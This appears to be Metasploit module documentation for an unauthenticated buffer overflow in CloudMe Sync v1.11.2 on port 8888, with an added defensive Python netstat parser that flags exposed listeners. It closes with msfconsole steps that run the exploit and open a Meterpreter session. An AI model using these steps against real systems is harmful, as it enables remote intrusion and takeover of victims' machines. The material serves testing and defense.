This module exploits a buffer overflow vulnerability found in CloudMe Sync v1.11.2.
An issue was discovered in CloudMe 1.11.2. An unauthenticated remote attacker who can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload that causes a buffer overflow condition. This lets the attacker control the program's execution flow and execute arbitrary code.
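A defender-side check for the exposure described above, as an added example that is not part of the original module documentation: it parses Windows `netstat -ano` output and reports TCP listeners on port 8888 bound to a non-loopback address, plus non-loopback peers connected to that port. The sample output is constructed, and the function names are hypothetical.

```python
import ipaddress

CLOUDME_PORT = 8888  # port the page gives for the CloudMe Sync listener

# Constructed sample of Windows `netstat -ano` output (not from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       4312
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5120
  TCP    192.168.56.10:8888     192.168.56.1:50122     ESTABLISHED     4312
  TCP    127.0.0.1:8888         127.0.0.1:50200        ESTABLISHED     5120
  TCP    [::]:8888              [::]:0                 LISTENING       4312
"""

def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr%zone]:port' into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]").split("%")[0]  # drop brackets and IPv6 zone id
    return ipaddress.ip_address(host), int(port)

def tcp_rows(netstat_text):
    """Yield (local, foreign, state, pid) for each TCP row, skipping headers."""
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[0] == "TCP":
            yield fields[1], fields[2], fields[3], int(fields[4])

def exposed_listeners(netstat_text, port=CLOUDME_PORT):
    """Listeners on `port` bound to a non-loopback address (reachable off-host)."""
    hits = []
    for local, _, state, pid in tcp_rows(netstat_text):
        addr, local_port = split_endpoint(local)
        if state == "LISTENING" and local_port == port and not addr.is_loopback:
            hits.append((local, pid))
    return hits

def remote_peers(netstat_text, port=CLOUDME_PORT):
    """Non-loopback peers with an ESTABLISHED connection to local `port`."""
    hits = []
    for local, foreign, state, pid in tcp_rows(netstat_text):
        peer, _ = split_endpoint(foreign)
        if (state == "ESTABLISHED" and split_endpoint(local)[1] == port
                and not peer.is_loopback):
            hits.append((foreign, pid))
    return hits
```

On a real host, pass the captured text of `netstat -ano` to these functions and map the returned PIDs to process names to confirm whether the listener is CloudMe.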
- Install CloudMe for Desktop version `v1.11.2`
- Start the application (you don't need to create an account)
- Start `msfconsole`
- Do `use exploit/windows/misc/cloudme_sync2`
- Do `set RHOST ip`
- Do `set LHOST ip`
- Do `exploit`
- Verify the Meterpreter session is opened